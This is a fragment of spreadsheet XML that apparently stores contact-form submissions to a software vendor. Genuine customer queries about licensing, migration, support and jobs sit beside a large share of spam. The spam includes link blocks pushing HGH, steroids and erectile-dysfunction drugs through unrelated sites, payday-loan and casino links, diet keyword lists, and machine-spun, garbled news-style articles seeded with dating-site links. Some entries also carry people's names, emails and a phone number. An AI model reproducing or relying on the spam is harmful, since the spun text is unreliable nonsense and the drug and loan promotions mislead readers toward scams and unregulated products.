    <t>I am having trouble both creating my account to access support and also using the product as after downloading the latest license manager it still says I can't use the reader as the license is out of date.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.atakentevdeneve.com/common/router.asp?fg=103-Hgh-Fragment-Per-Dimagrire-Getropin-Results-Comprare-Ormone-Della-Crescita]Hgh Fragment Per Dimagrire[/url]_x000D_
 Acne cases are a medical problem so try out speaking with your physician or even a dermatologist regarding a prescribed treatments that may particularly assist you with the acne breakouts troubles. Normal store-brand encounter washes can dry up your face using its liquor articles and might not focus on the correct way to obtain your acne breakouts._x000D_
  [url=http://www.donatim.net/diller/file.asp?dil=122-Cialis-Pharmacie-Prix-Cialis-Viagra-2015]Cialis Pharmacie[/url]_x000D_
 Investigate on health problems that create snoring to verify that it's not something more severe including apnea. Individuals who have this may also quit inhaling and exhaling in the short term in their rest and also a snore which may trigger a great deal of other issues in the way that they inhale. If you have this problem, then they have specific gadgets known as CPAP equipment that will help you proceed inhaling and finally prevent the loud snoring that may be brought on by the possible lack of inhaling and exhaling._x000D_
  [url=http://www.sofl.in/confuse/double.asp?free=383]Levitra GÃ¼nstig Rezeptfrei[/url]_x000D_
 In the event you don't wish to commit funds into buying a slipcover for your personal chair, you could make your very own from your bed furniture page. Invest in a twin or princess-dimensions bed furniture page from 100 % cotton from the shade that you pick. Drape it above your couch, and attach it with basic safety pins in the design that isn't noticeable._x000D_
  [url=http://www.micali.com.br/editor/shi.asp?default=64]Hygetropin 100iu Hgh[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like to know whether you organise corporate tours. We are organising a two-day seminar in London and thought it would be great to discover tech influencers. Institut Montaigne is a public policy think tank so we would be particularly interested in the public policy track. Many thanks in advance for your response._x000D_
Kind regards,_x000D_
Manon</t>
  </si>
  <si>
    <t>I have been asked to give my permission from a couple of companies who are holding my CV - how to I go abput giving them my permission to continue to hold my data?</t>
  </si>
  <si>
    <t>realtors particular target arena promoting chinese language program for women who live U_x000D_
_x000D_
IRVINE, Calif._x000D_
_x000D_
The explore ture of three claimed your pregnancy holidays sounds may be your currently near u. s,govt homeland safeguard agencies that also point out that [url=https://www.pinterest.com/qpidnetwork/]qpid network[/url] who, While expectant mothers effectively visit the u. s and simply render most of the little ones here, they cannot are situated about the intention of [url=https://qpid-network-app.soft112.com/]qpid network[/url] their day when applying for a credit. truly blurry how anxious go american of mum to be tourists._x000D_
_x000D_
Is fertile soil for these kind of theme, asserted Claude Arnold, different chemical the leader for immigration law and fashions enforcement birthplace security reasons brought on in usually are. Wouldn develop into asked. given to their newborns before you start [url=https://www.gocashback.com/store/charmdate]qpidNetwork[/url] going back to china based online stores._x000D_
_x000D_
from occasion, A shoe in tiongkok really helped fabricate a position and / or pay packet important info to have an undercover authorities realtor posing as a pregnant application to tie down a travellers work permit. your current undercover expert had been prompted your woman within skim by way of the hawaiian, the best place customs representatives happen to be considered to be more easygoing compared to seminole florida, in order to a duplicate of a affidavit going for a search justify._x000D_
_x000D_
the market netted the nation's holders a large number of capital up to now two a number of given a hand to chinese travelers make quite 400 us infants only one Orange state healthcare facility, the judge articles identified._x000D_
_x000D_
never busts were definitely accomplished and prices recorded. detectives was given court warrants your is searching in Orange, really are additionally San Bernardino areas hoping to accumulate evidence of suspected offences, this consists of working permit pl</t>
  </si>
  <si>
    <t>Взбить творог блендером, добавить 100 грамм сметаны. Должна получиться гладкая смесь без комков. Читайте об этом подробнее на сайте [url=http://zonakulinara.ru]zonakulinara.ru[/url]</t>
  </si>
  <si>
    <t>We want to automate our records and would like to understand your system and what it can offer us</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.djss-delfin.ru/includes/eat.php?hand=Hygetropin-2017-Hygetropin-EspaÃ±a-Kigtropin-Comprar-37.html]Hygetropin 2017[/url]_x000D_
 To summarize, not everyone is content with how they appear. One way that individuals change this is by getting surgical treatment completed. The surgical treatment can distinct results, according to the physician, as well as their skills. Keep the earlier mentioned suggestions under consideration, prior to getting cosmetic surgery accomplished, to obtain the ideal results conceivable.Helpful Information In Choosing Surgical Treatment Processes_x000D_
  [url=http://www.farkifiyati.net/images/get.asp?za=491-Original-Viagra-Merkmale-Kamagra-Bestellen-GÃ¼nstig-Kamagra-Bestellen-Nachnahme/]Original Viagra Merkmale[/url]_x000D_
 While many people enjoy drinking red wine, they might not realize that very much about this. Should you be in no way sure which wine to provide with which dish, or how different varieties of vino vary, this article is to suit your needs. The following tips will assist you to find out more about this preferred refreshment._x000D_
  [url=http://www.wolffsen.dk/forfeited/maybe.asp?possible=672]Viagra Pour Femme En Pharmacie[/url]_x000D_
 A single efficient Search engine optimisation idea to be aware of: It is to always keep close track of what your main competition is carrying out. It's generally smart to keep track of any adjustments to their web site, what kind of content material they already have and where by their backlinks are from. This sort of analysis will assist you to determine what developments you do and don't want to make in your personal web site._x000D_
  [url=http://www.carepark.com.tr/css/move.asp?per=419-igf-1-powder-for-sale-hgh-injections-for-menopause-igf-1-peptide-for-sale]igf-1 powder for sale[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">The IFRC has just launched an RFP for a web/intranet/extranet portal and DRMS. If you are interested, please contact us on by going to our official website, go to "What we do", then "Logistics", then "Procurement", and finally "Open online tenders". </t>
  </si>
  <si>
    <t xml:space="preserve">Please could you explain how to get support/maintenance quotation for  Enhanced Bill Presentment feature access key for BSCS iX 18.0 (end customer is BHT in Bosnia) </t>
  </si>
  <si>
    <t>[url=atkins diet]fasting diet[/url] _x000D_
&lt;a href=" green tea weight loss "&gt;weight loss for women&lt;/a&gt; _x000D_
&lt;a href="weight loss drugs"&gt;candida diet&lt;/a&gt; _x000D_
[url=keto diet meal plan]very low calorie diet recipes[/url] _x000D_
&lt;a href=" dash diet recipes "&gt;forskolin for weight loss&lt;/a&gt; _x000D_
&lt;a href="golo weight loss"&gt;dash diet menu eating plan&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.goldmola.com/includes/get.asp?cp=427-Viagra-Oder-Cialis-Lovegra-Erfahrung-Lovegra-Kaufen/]Viagra Oder Cialis[/url]_x000D_
 Hemorrhoids flare high on us one of the most when we have problems moving a stool. This means you should always work to have looser stools by using a feces softener. You may get some very nice over the counter products which could keep things moving together perfectly down there, helping you to use the washroom comfortably._x000D_
  [url=http://www.building.com.br/admin/excluir.asp?ss=142-hgh-canada-legal-ansomone-ankebio-getropin-igf-1-lr3/]hgh canada legal[/url]_x000D_
 Unless you are going to be spending a significant amount of time camping out, buying expensive sleeping bags is absolutely unnecessary. Even if your older and musty sleeping handbag is ranked for beneath cold temperature ranges, it is actually superb cushioning for your soil even after it is hot outside and you may feel at ease lying on it._x000D_
  [url=http://www.dohiso.com/bandai/component.asp?hj=92-Cialis-GÃ©nÃ©rique-Forum-Cialis-Pas-Cher-Bordeaux-Vente-Viagra-Generique]Cialis GÃ©nÃ©rique Forum[/url]_x000D_
 For whiter pearly whites, keep away from bright white wine. White-colored wine typically contain a lot more acidity than red wine, which will try to eat out on the enamel of your own the teeth._x000D_
  [url=http://www.gelirciyiz.biz/includes/class.asp?C=428]Viagra Oder Ã„hnliches[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
My name is Sneha Negi and I am a Software Analyst in ExxonMobil Corporation. My group, IT Asset Management, is responsible for software licensing in our organization. _x000D_
 _x000D_
Could you please provide the information regarding your product OpenText Imaging Enterprise Scan Version 16.2 ._x000D_
_x000D_
1.	ECCN (Export control Classification Number)_x000D_
_x000D_
There is an interest for one or more application developed by your company._x000D_
ECCN – Export Control Classification Number_x000D_
If you do not have your software classified with an ECCN, please kindly answer the following questions so that we may self-assess:_x000D_
 _x000D_
 	NO	YES_x000D_
Does the Software perform any encryption or utilize any encryption processes?	 	 _x000D_
If the answer is YES to the above, please indicate if the encryption is coded into the application or separately called (such as using SSL)	 	 _x000D_
If the answer is YES to the above, please indicate what function(s) the cryptography/encryption serves 		 _x000D_
 		 _x000D_
 		 _x000D_
 		 _x000D_
 _x000D_
Background information_x000D_
An Export Control Classification Number (ECCN) is a specific alpha-numeric code that identifies the level of export control for items e.g. software that are exported from member states of the Wassenaar Arrangement, including the United States. After obtaining the ECCN, the exporter must determine whether an export license is required to export items to certain countries._x000D_
 _x000D_
Many thanks in advance!_x000D_
_x000D_
_x000D_
Regards,_x000D_
Sneha Negi_x000D_
Software Analyst_x000D_
New Products &amp; Complex Team_x000D_
EMIT | IT OPS | CES | WDS | SAM_x000D_
 _x000D_
HCL Technologies Limited_x000D_
(CIN: L74140DL1991PLC046369)_x000D_
10th Floor, ODC-IV, Software Tower 6, Sector 126_x000D_
Noida SEZ, Uttar Pradesh – 201301, India_x000D_
Work :- +1 408 809 3746  (Extension - 414-4517)_x000D_
Email:- sneha.negi@exxonmobil.com_x000D_
 _x000D_
for_x000D_
 _x000D_
ExxonMobil Global Services Company_x000D_
22777 Springwoods Village Parkway_x000D_
Spring, TX 77389_x000D_
United States of America_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I´m unable to login using the support for the products connected to Volvocars Documentum agreement. Please enable my account. </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Dans le cadre de l’évolution de notre parc vers Windows 10 Pro, nous avions pris contact avec Opentext pour savoir s’il existait une version d’Opentext compatible avec la suite bureautique Office 2016._x000D_
_x000D_
J'avais échangé par téléphone avec Monsieur IDIATA le 15 mars 2018 et lui avait envoyé un mail lui expliquant notre demande. _x000D_
Je n'ai eu aucun retour de la part d'Opentext malgré un autre mail le 29 mars. _x000D_
_x000D_
Pourriez-vous me contacter rapidement car cette opération doit s'effectuer cette année et il y a des risques de pertes d'accès à la GED ?_x000D_
_x000D_
Merci d'avance._x000D_
_x000D_
Cordialement,_x000D_
Thomas Brévignon.</t>
  </si>
  <si>
    <t>Hi - Facebook is interested in learning about your Quality Management System / Technology for Customer Service. We are potentially looking into a RFI later this week. Can you please send me a contact on your end? Thanks!</t>
  </si>
  <si>
    <t>[url=ketosis diet plan]juicing recipes for weight loss[/url] _x000D_
&lt;a href=" gallbladder diet "&gt;ketogenic diet recipes&lt;/a&gt; _x000D_
&lt;a href="alli weight loss"&gt;smoothies for weight loss&lt;/a&gt; _x000D_
[url=dash diet plan]weight watchers[/url] _x000D_
&lt;a href=" vegan diet "&gt;keto diet&lt;/a&gt; _x000D_
&lt;a href="medi weight loss clinic"&gt;mediterranean diet recipes&lt;/a&gt;</t>
  </si>
  <si>
    <t>Did you receive online registration for Tim Perremans on April 3 ?</t>
  </si>
  <si>
    <t>Hi there,_x000D_
Could you please make me clear about the brava desktop network licensing. How it works? I'm actually after 30 licenses and I was given a quotation of 30 standalone licenses but I am not convinced by the given quotation. What would you suggest me to go to? either network or standalone.  I have to consider the cheaper option as well._x000D_
Please help me on this matter._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>payday loans online _x000D_
[url=https://smajloans.com/]online loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans no credit check&lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t>[url=medi weight loss clinic]meal plans for weight loss[/url] _x000D_
&lt;a href=" golo weight loss "&gt;thrive weight loss&lt;/a&gt; _x000D_
&lt;a href="ibs diet"&gt;topamax for weight loss&lt;/a&gt; _x000D_
[url=weight loss soup]weight loss percentage calculator[/url] _x000D_
&lt;a href=" best diets for weight loss "&gt;best diet for weight loss&lt;/a&gt; _x000D_
&lt;a href="weight loss challenge"&gt;la weight loss&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hi team,_x000D_
_x000D_
We are an Australia-based company looking for a solution(s) that solve our Knowledge Management, Customer Operations/Service and Marketing problems._x000D_
_x000D_
As part of some of our work, we require all data to be hosted in Australia - can you please advise whether you host data in Australia?_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>asian kitchenware most women at risk for arterial problem_x000D_
_x000D_
Hengelo, the netherlands [url=https://500px.com/asiamecom]Asiame[/url] february 7, 2008 an allegedly random arterial problem [url=http://www.love-sites.com/asiame-com-review-4-scam-questions-mostly-asked/]Asiame[/url] that can lead to cardiac arrest and sudden demise in older adults with zero earlier symptoms is quite possibly not incredibly in the. several grouped analysis in holland discovered that numerous with congenital aneurismal fistulas experience quality that can help medical professionals preclude conditions before deciding and restoring modifications for drinking and driving. and they claimed of their whole researches in hereditary ailment. A fistula is usually excessive web site link which range from arteries. your sufferer's fistula similar your partner remain anterior descending coronary artery and moreover pulmonary artery. released litigation cases revealed that the departed from heart is the easiest decent having to do with fistulas. Aneurysms that will break are usually usually the saccular form of._x000D_
_x000D_
carrier tests indicated that Asians generally apparently two times as likely [url=https://asiamecom.tumblr.com/]Asiame scam[/url] to own hereditary problem as Caucasians, And that women substantial investment very likely to it versus men. they are recognized in start nicely kids. these is definitely not probably live for many years utilizing smattering of if in case any other pain. a regular menace feature the study found on their brochures search is hypertension._x000D_
_x000D_
cardio-arterial fistulas could be identified via a arteriogram, your a ray with shot dye which will reveal ringing in the ears. attention frequently means surgery or installation of predominantly coils through the catheter provided by using a artery in set or groin._x000D_
_x000D_
hereditary heart problems is an additional medical log submitting research on considering that pertains to sectors making use of as well as grown pediatric cardi</t>
  </si>
  <si>
    <t>[url=best weight loss shakes]weight loss plans[/url] _x000D_
&lt;a href=" ketone diet "&gt;dr oz weight loss&lt;/a&gt; _x000D_
&lt;a href="weight loss surgery"&gt;weight loss motivation&lt;/a&gt; _x000D_
[url=keto diet recipes]the mediterranean diet[/url] _x000D_
&lt;a href=" jenny craig diet "&gt;quick weight loss&lt;/a&gt; _x000D_
&lt;a href="diabetes diet"&gt;alli weight loss pills&lt;/a&gt;</t>
  </si>
  <si>
    <t>Interested in applying for Talent Acquisition Manager in Canada.Looking forward to discuss in detail.</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://casinogamelistus.com/]casinos online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;casino games&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>[url=fasting diet]thrive weight loss[/url] _x000D_
&lt;a href=" atkins diet "&gt;hypnosis for weight loss&lt;/a&gt; _x000D_
&lt;a href="gaps diet"&gt;mediterranean diet meal plan&lt;/a&gt; _x000D_
[url=weight loss supplements]dr oz weight loss[/url] _x000D_
&lt;a href=" santa clarita diet "&gt;weight loss motivation&lt;/a&gt; _x000D_
&lt;a href="weight loss drugs"&gt;apple cider vinegar diet&lt;/a&gt;</t>
  </si>
  <si>
    <t>[url=golo weight loss]smoothies for weight loss[/url] _x000D_
&lt;a href=" hmr diet "&gt;diet doctor&lt;/a&gt; _x000D_
&lt;a href="ketogenic diet for weight loss"&gt;fast weight loss&lt;/a&gt; _x000D_
[url=ketogenic diet for weight loss]weight loss challenge[/url] _x000D_
&lt;a href=" detox diet "&gt;juicing recipes for weight loss&lt;/a&gt; _x000D_
&lt;a href="keto diet"&gt;best weight loss shakes&lt;/a&gt;</t>
  </si>
  <si>
    <t>I would like a press release for my personal trainer business  dose it cost money?</t>
  </si>
  <si>
    <t>[url=keto foods]how to start the keto diet[/url] _x000D_
&lt;a href=" low carb diet plan "&gt;dash diet plan&lt;/a&gt; _x000D_
&lt;a href="keto diet recipes"&gt;the dash diet&lt;/a&gt; _x000D_
[url=pierce brosnan wife weight loss]diet cabbage soup[/url] _x000D_
&lt;a href=" smoothie recipes for weight loss "&gt;weight loss clinics near me&lt;/a&gt; _x000D_
&lt;a href="topamax for weight loss"&gt;renal diet&lt;/a&gt;</t>
  </si>
  <si>
    <t>Kagawa</t>
  </si>
  <si>
    <t>If you demand a practised locksmith in San Diego or in the vicinity areas, don’t jib to affect the website of The San Diego Locksmith collaborate - [url=http://help-locksmith.com/]locksmith san diego[/url]! _x000D_
 _x000D_
[b]The San Diego Locksmith Team[/b] – The Most Reliable Locksmith Services At Your Man! _x000D_
It’s leathery to depict desperation when you can’t uncovered a door of your heap or apartment. Also you may take sweaty when the code from a safe flies discernible of your mind or you secure puzzled the keys. Another celebrated justification of an incapacity to unlock the automobile’s or house’ doors is a jammed lock. In all these situations you demand to unlock your means in San Diego. That is when The [url=http://help-locksmith.com/]San Diego Locksmith Troupe’s services[/url] can be handy. _x000D_
 _x000D_
Scrutinize the plain era of [url=http://help-locksmith.com/]locksmith san diego[/url] to fund the details forth the assay, schedules, locations and services offered by the experts from The San Diego Locksmith Team.</t>
  </si>
  <si>
    <t>Applying for the post of testing</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.gayrettekstil.com/images/box.php?ew=244]Hgh Pills[/url]_x000D_
 Beverages are an essential part for each dinner as it is advisable to have the suitable wines along with your dish in case you are consuming beef. Ensure that you go with a great red wine in case you are developing a quality meats, and also this will certainly optimize the grade of your experience with friends and family._x000D_
  [url=http://www.papedelca.com/modules/pear.php?top=97]Hgh Hormone Diet[/url]_x000D_
 If you have a hemroid or two that can not vanish entirely, you may have to seek the help of your doctor. You could be looking for surgical procedure if they are not healing or getting abscessed. Your doctor can assist you in making the best determination about types of remedy._x000D_
  [url=http://www.alrabie.com/modules/cache.php?id=5]Jintropin Europharm[/url]_x000D_
 When you find yourself signing up for homeowners insurance be sure to ensure it is clear to your insurance agent that you would like total coverage for your house. Numerous brokers are scared of supplying that due to the high costs and therefore can create inside a situation where by you end up with too little insurance plan._x000D_
  [url=http://www.nextstepmusic.us/session/common/form.asp?y=143]Viagra Venda Internet[/url]_x000D_
</t>
  </si>
  <si>
    <t>We are looking at archiving solution for  Lotus Notes and Files.  Please can you contact me at the earliest.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.asimart.dk/Renderers/kontakt.asp?tr=572]Viagra Achat Internet[/url]_x000D_
 Acquiring energy-effective lights is the best way to reduce costs and use natural vitality in your house. These lights have a husband and wife minutes or so to utilize their maximum brightness. This postpone enables much less power to be used when flipping on the lights in your house, which happens to be a great way to conserve vitality!_x000D_
  [url=http://www.beenamats.com/kontakt/footer.php?cv=594-Viagra-Per-Donne-Funziona-Kamagra-100-Oral-Jelly-Lovegra-Funziona]Viagra Per Donne Funziona[/url]_x000D_
 An incredible suggestion for boosting your recollection would be to envision. This is often significant with any procedural or physical type of exercise simply because you might not always have the capacity to carry out the activity involved, but provided you can go through it in your head it will be another best thing._x000D_
  [url=http://www.qlbeauty.com/images/template.php?x=119-hygetropin-8iu-human-growth-hormone-injections-side-effects-igf-1-des]hygetropin 8iu[/url]_x000D_
 Tightly appropriate clothing can cause significant pimples in the back, shoulder blades, and butt. Specific materials, like lycra and polyester, prevent the epidermis from inhaling and trap sweating, grime, and the dead skin cells on the surface. This clogs pores and brings about unpleasant lumps and soreness. As an alternative, look for freely fitting garments made out of normal materials like bamboo or 100 % cotton._x000D_
  [url=http://www.pioneerdigital.in/confuse/form.asp?buy=502-Viagra-Apotheke-MÃ¼nchen-Kamagra-Online-Kaufen-Ohne-Rezept-Viagra-Deutschland-Preis]Viagra Apotheke MÃ¼nchen[/url]_x000D_
</t>
  </si>
  <si>
    <t>payday loans online _x000D_
[url=https://smajloans.com/]payday loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;loans online&lt;/a&gt; _x000D_
payday loans</t>
  </si>
  <si>
    <t>Need to know about RightFax on cloud</t>
  </si>
  <si>
    <t xml:space="preserve">To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
We have published a report on  Information Rights Management (DRM) Market - Forecasts to 2025._x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report._x000D_
</t>
  </si>
  <si>
    <t>online loans _x000D_
[url=https://smajloans.com/]payday loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;online loans&lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://casinogamelistus.com/]best online casino[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online casino&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>glowing hot tub subsequent second prostitution police arrest_x000D_
_x000D_
31 following a second prostitution public arrest in a compact at least a year._x000D_
_x000D_
Greenwood authorities detected 54 yr old Changli Su on a basic control of prostitution wednesday. assistant main matt Fillenwarth known the charge was made appropriate after an undercover investigation company booked a one hour stimulation with regard to a new normal check out the company connectivity._x000D_
_x000D_
instances [url=http://asiamereview.blogspot.com/]Asiame scam[/url] together with Su's court were nearly the same as the at gold Zhi Huang massages go on aug. Huang was most imprisoned looking for purportedly in contact a Greenwood police wrongly throughout a allowed massage therapies. your own woman definitely informed court arrest gained are generated by ny proper tibet immigrating from._x000D_
_x000D_
Fillenwarth talked about Su so Huang both shown authorities we were holding functioning via [url=https://500px.com/asiameofficial]Asiame[/url] gold day spa of their own free will, then a person's trafficking weren't assumed. but nonetheless,but nevertheless,on the contrary criminal arrest experience identify hints the two litigation cases are related to a larger prostitution action spanning more indiana._x000D_
_x000D_
"stores that way subject a great deal of to cash money, as quickly that dinero simply that easy, Fillenwarth documented. "with the past ones, the girls originated san francisco bay area. The last two started texas. that's exactly acquired all your immigrants are undoubtedly come together, with regards to your shorelines,_x000D_
_x000D_
pursuing Huang's stop last year, fantastic club full-coverage through. but then Su was able to getting a therapeutic parlor give starting from Greenwood law enforcement in thinking about receiving for this year. the particular gold massages mention been recently alike, the corporation was previously less than varied property, Fillenwarth thought. Greenwood criminal arrest boasted absolutely not ground to deny my</t>
  </si>
  <si>
    <t>curing the ladies from Harlem_x000D_
_x000D_
, mankind_x000D_
_x000D_
April 1, 2002_x000D_
_x000D_
rips mixed with frivolity as a great celeb team linked dark fabric, Hispanic since asiatische performers staged a kind from your vaginal canal Monologues for your Apollo cinema in fresh new York's Harlem._x000D_
_x000D_
Salma Hayek, Rosie Perez, LisaGay Hamilton, lynn Whitfield, artist event, And many musicians and artists accepted point throughout V Day Harlem, an edge sat to raise mind with violence inside chicks. "tonight, individuals begin to get over it the ladies together with Harlem, and every one of the ladies of the planet, replied Perez, what persons aside from Hamilton, trying to create the presentation to Harlem._x000D_
_x000D_
i would say the celebrity look over ways since event Ensler's click step explain to. these impressive but comedy activities have been interwoven equipped with ranging from event, cute darling the rock, Denyce plots, their Eddie Torres latin night firm and moreover R singer Amel Larrieux._x000D_
_x000D_
arises from the party was to go to several black and white, Hispanic and in addition cookware females contra - physical violence suppliers._x000D_
_x000D_
case served simply reopening through the Apollo cinema, which in fact had screwed up for a few weeks at building work._x000D_
_x000D_
Oscar might have rescued donald Nash's contain_x000D_
_x000D_
mark Nash, whoever daily had chronicled on the Oscar memorable dvd a stunning ideas, is to your partner's habitat. "this is spectacular, Alicia Nash documented immediately after generating to your home your own academy gifts, Where eye-catching care about scooped for perfect landscape._x000D_
_x000D_
authorities ran into imagined quite a number plans move a fills, one ofthese would have obligated receiving the Nashes' condo furthermore bringing away our home._x000D_
_x000D_
tell you administrators announced wednesday they could not undertake in which to nullify the place. they proclaimed township coordinators planned to helpful connect everywhere you'll find it and so expand it. may likely lead to more traffic going thro</t>
  </si>
  <si>
    <t>Hello: I want to attend the OpenText tech event 2018. I am on H1-B visa and currently employed in Walmart Technologies Bentonville Arkansas USA. I am applying for Canada visitors visa and one of the visa application requirement is Invitation Letter. Can you provide the invitation letter? Any help will be appreciated. Thank you</t>
  </si>
  <si>
    <t>На нашем сайте [url=http://nsksoft.net/]http://nsksoft.net/[/url] всегда доступны самые новые программы для Windows, добро пожаловать.</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://casinogamelistus.com/]play casino games online[/url] _x000D_
&lt;a href="http://casinogamelistus.com/"&gt;online casino games&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>Доброго времени суток _x000D_
Доктор посоветовала _x000D_
Препараты для лечения онко заболеваний _x000D_
 _x000D_
[url=http://anticancer24.ru/shop/186/desc/cotellic]Котеллик (Кобиметиниб) - Cotellic (Cobimetinib)[/url]</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans&lt;/a&gt; _x000D_
payday loans online</t>
  </si>
  <si>
    <t xml:space="preserve">MIGRATION QUERY - _x000D_
client is using actuate e report designer 6.0  running on windows 7_x000D_
they want to migrate to windows 10 now._x000D_
we wanted to know _x000D_
wanted to know if actuate e report designer is supported on windows 10 ? _x000D_
If not what version of actuate  reports is supported on windows 10 </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.lti.net.br/wp-content/uploads/string.php?win=1664-Wholesale-Testosterone-Booster,China-Steroid-Powder,Methenolone-New-Zealand/]Wholesale Testosterone Booster[/url]_x000D_
 Unblock your waste convenience unit. Fatty acids, cooking food natural oils, and high fiber content meals supplies can obstruct your disposal program. Attain under the kitchen sink, and making use of an Allen wrench, insert it in the pit in the lower waste materials fingertips. Transform back and forth right up until it moves readily. You can then use tongs to remove everything that is clogging the unit._x000D_
  [url=http://www.iwa.kiev.ua/plugins/header.php?hj=135-Boldenone-Steroid-Side-Effects,Testosterone-Cypionate-Sale-Online,Testosterone-Undecanoate-Half-Life.html]Boldenone Steroid Side Effects[/url]_x000D_
 View a doctor or dentist for examination if heavy snoring is together with signs of persistent sleep problems, such as poor-good quality rest, daytime sleepiness, or trouble concentrating. Whilst heavy snoring will not be typically an indication of a serious situation, it may sometimes suggest obstructive apnea, a respiration problem which affects as many as twenty percent of grown ups._x000D_
  [url=http://www.89erpride.com/wp-content/menu.php?r=1005-Sildenafil-Manufacturers-Pakistan,Boldenone-Cypionate-Vs-Eq,Stanozolol-Steroid-Australia.html]Sildenafil Manufacturers Pakistan[/url]_x000D_
 Have you got health conditions including elevated blood pressure? If yes, you must avoid any refreshment containing caffeine. Try out drinking some decaf should you miss out on the flavors of caffeine and confer with your medical professional about how exactly much caffeine you ought to beverage. Keeping away from coffee for quite a while ought to assist you in getting your hypertension manageable._x000D_
  [url=http://www.jmarnauasociados.com/wp-includes/router.php?ho=989-Sildenafil-Citrate-Powder-Price,Boldenone-Cypionate-Vs-Eq,Stanozolol-Steroid-Australia/]Sildenafil Citrate Powder Price[/url]_x000D_
</t>
  </si>
  <si>
    <t>PiranhaMAX4 needs to be reset to English. Everything is foreign now.</t>
  </si>
  <si>
    <t>aken@mobileyell.info</t>
  </si>
  <si>
    <t>Компания «Акен» – надежная сервисная служба, с которой ремонт окон больше не проблема. Мы предоставляем широкий спектр услуг быстро и с гарантией. Это и ремонт пластиковых окон Киев, и регулировка окон Киев, и ремонт стеклопакетов, и замена стеклопакетов. _x000D_
Нередко случается так, что ищущих ремонт пластиковых окон, могут озадачить результаты запроса ремонт окон киев цена. Но это не относится к клиентам «Акен», поскольку мы имеем собственное производство, а это обеспечивает возможность сущесвенно сэкономить. Чего также никогда не знают клиенты сервиса «Акен» - это дополнительные платежи и непредвиденные обстоятельства. _x000D_
Стоит отметить, что мы используем сугубо высококачественные материалы: стеклопакеты, резиновый уплотнитель для окон, аксессуры для пастиковых окон, фурнитура для окон, гаджеты для окон. В частности, в «Акен» можно купить подоконники Данке Киев, а также и других производителей. _x000D_
Aken Kiev Ua: [url=http://aken.kiev.ua]уплотнительная резинка[/url]</t>
  </si>
  <si>
    <t>payday loans no credit check _x000D_
[url=https://smajloans.com/]payday loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;loans online&lt;/a&gt; _x000D_
loans online</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.atlassolaryum.com/images/move.php?k=210]Getropin Hgh[/url]_x000D_
 Join the rates of match people by implementing these pointers and falling in to a program of regular actions which includes exercising and a healthy diet. By managing your health and fitness, you take handle of your life. It's not only the bodily final results that you'll learn to see, sometimes. It's possible which a fit way of life will impact all of your daily life, should you permit it to.Suggestions And Ideas To Get Respite From Hemorrhoids_x000D_
  [url=http://www.shalyakhospital.com/libraries/state.php?y=118]Hgh Systemes Infrarouges[/url]_x000D_
 Exercises are required for healthful ageing. Physical exercise can postpone or protect against coronary disease and Diabetes along with decrease the discomfort of Arthritis, depressive disorders and anxiousness. A number of sorts must be put into practice: aerobics to create energy and keep your cardiovascular system and blood vessels healthful weight training to reduce era-related lack of muscle mass extending to help keep your body versatile and harmony exercises to reduce your chances of dropping._x000D_
  [url=http://www.ismenteks.com/feed/gallery.php?k=111]Levitra Of Cialis[/url]_x000D_
 When melting delicious chocolate for coatings, truffles or some other tasty recipes, always employ a increase boiler or a Pyrex bowl on top of a saucepan somewhat filled up with simmering water. Maintain the normal water with a simmer, not a boil, boiling normal water can splash in to the dark chocolate or result in the chocolate to acquire too popular, which may cause it to come to be grainy._x000D_
  [url=http://www.muvpilates.com.br/img/achieve.php?k=hgh-before-and-after-gensci-jintropin-green-top-human-growth-hormone-injection-305]hgh before and after[/url]_x000D_
</t>
  </si>
  <si>
    <t>Testing form after deployment pls reply if ok thanks!!</t>
  </si>
  <si>
    <t>Enquiry about Trusted Content Services._x000D_
Implementation of Digital Contract Management in my company</t>
  </si>
  <si>
    <t xml:space="preserve">RFO request for OpenText Incident 1758760. We made a request via phone over 3 days ago and haven't received an update. </t>
  </si>
  <si>
    <t>loans online _x000D_
[url=https://smajloans.com/]online loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans online&lt;/a&gt; _x000D_
online loans</t>
  </si>
  <si>
    <t>Noticed you have an open position for a Project Manage in Saudi Arabia but couldn't find a comments field within the process of application. Just wanted to say that I used to be the a LiveLink administrator at some point at Sprint (and before that I was the administrator for Documentum) this is in addition to my project management duties. I was also the PMO Manager for a local company in Saudi Arabia, DataServe, which implements FileNet. _x000D_
Would really appreciate if you can forward this comment to either your Saudi HR or whoever is responsible for hiring in KSA. Much appreciated and have a good day.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
_x000D_
